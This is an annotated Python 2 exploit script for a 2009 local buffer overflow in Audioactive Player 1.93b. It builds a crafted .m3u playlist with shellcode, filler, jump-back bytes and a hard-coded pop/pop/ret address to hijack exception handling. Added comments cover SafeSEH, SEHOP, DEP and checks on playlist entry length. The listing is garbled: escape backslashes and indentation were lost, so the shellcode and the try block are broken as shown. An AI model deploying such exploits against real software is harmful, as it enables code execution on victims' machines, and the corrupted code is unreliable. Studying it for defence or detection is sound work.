# Title : Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)
# Published : 2009-05-15
# Author : His0k4
#usage: exploit.py
#Open the program, then double-click the exploit file
# Banner: prints the advisory title, credits and tested platform to stdout
# using Python 2 print statements. Nothing here affects the generated file.
# NOTE(review): the trailing "n" on several lines looks like a newline escape
# whose backslash was lost when this page was extracted -- confirm against the
# original advisory.
print "**************************************************************************"
print " Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)n"
print " Credits : hack4loven"
print " Seh Exploit: His0k4n"
print " Tested on: Windows XP Pro SP3 (EN)n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.comn"
print "**************************************************************************"
# Payload embedded in the crafted playlist entry. Per the generator comment
# below, this is a Metasploit win32_exec payload with CMD=calc: a
# proof-of-concept that starts the calculator to demonstrate code execution.
# NOTE(review): the escape backslashes appear to be missing in this listing, so
# as shown the literal is plain ASCII text rather than the 165 bytes the
# comment describes; len(shellcode) further down would not match that size.
# win32_exec - EXITFUNC=seh CMD=calc Size=165 Encoder=JmpCallAdditive http://metasploit.com
shellcode=(
"xfcxbbx5dx53x65x97xebx0cx5ex56x31x1exadx01xc3x85"
"xc0x75xf7xc3xe8xefxffxffxffxa1xbbx21x97x59x3cx21"
"xd2x65xb7x49xd8xedxc6x5ex69x42xd1x2bx31x7cxe0xc0"
"x87xf7xd6x9dx19xe9x26x62x80x59xccxa2xc7xa6x0cxe8"
"x25xa9x4cx06xc1x92x04xfdx2ex91x41x76x71x7dx8bx62"
"xe8xf6x87x3fx7ex57x84xbex6bxecxa8x4bx6ax19x59x17"
"x49xd9x99x99x51x85x96x9ax61xc0x69x62x8ex41x29x9f"
"x05x25xb6x32x92xadxcexa7xacxa6x4fx87xafxb8x4fx63"
"xc7x84x10x42xeex94xf8x2dxf6xd7xc5x55x57xbfx35x23"
"x53x60xdexacxa2x14x10x9axa5xcfx4ex45x36x6cx91x85"
"xc6x72x91x85xc6")
# Assemble the oversized string that goes into the playlist entry, in order:
#   1. filler sized so that filler + shellcode spans 589 characters,
#   2. the shellcode,
#   3. two short sequences the author labels "go back",
#   4. a 4-byte value the author labels as a pop/pop/ret in msacm32.drv
#      (the "SEH" of the title: a structured-exception-handler overwrite),
#   5. 900 characters of trailing filler.
# NOTE(review): the value in step 4 is a hard-coded address; the banner lists
# only Windows XP Pro SP3 (EN) as tested, so it is presumably specific to that
# build of the module -- confirm before relying on it for a signature.
# Defensive note: the technique depends on an overwritten exception-handler
# pointer being accepted by the OS; SafeSEH-built modules, SEHOP, DEP and ASLR
# are the platform mitigations aimed at it.
payload = "x41"*(589-len(shellcode))
payload += shellcode
payload += "xE9x56xFFxFFxFF" # go back
payload += "x74xF9xFFxFF" #go back
payload += "xDEx19xD1x72" # Friendly p/p/r msacm32.drv
payload += "x44"*900
# Write the crafted entry to exploit.m3u as one URL-shaped line ending in
# ".mp3", then wait for a key press (Python 2 raw_input).
# NOTE(review): the try/except bodies are not indented in this listing
# (whitespace lost in extraction), so this is not valid Python as shown.
# The bare except replaces the real failure reason with a generic "Error".
# Defensive note: the playlist line is far longer than any normal stream URL
# (589 + 13 + 900 payload characters were intended) and is meant to carry
# non-URL bytes; bounding entry length in playlist parsers and flagging
# over-long .m3u entries are the corresponding controls.
try:
out_file = open("exploit.m3u",'w')
out_file.write("http://www.google.com/"+payload+".mp3rn")
out_file.close()
raw_input("nExploit file created!n")
except:
print "Error"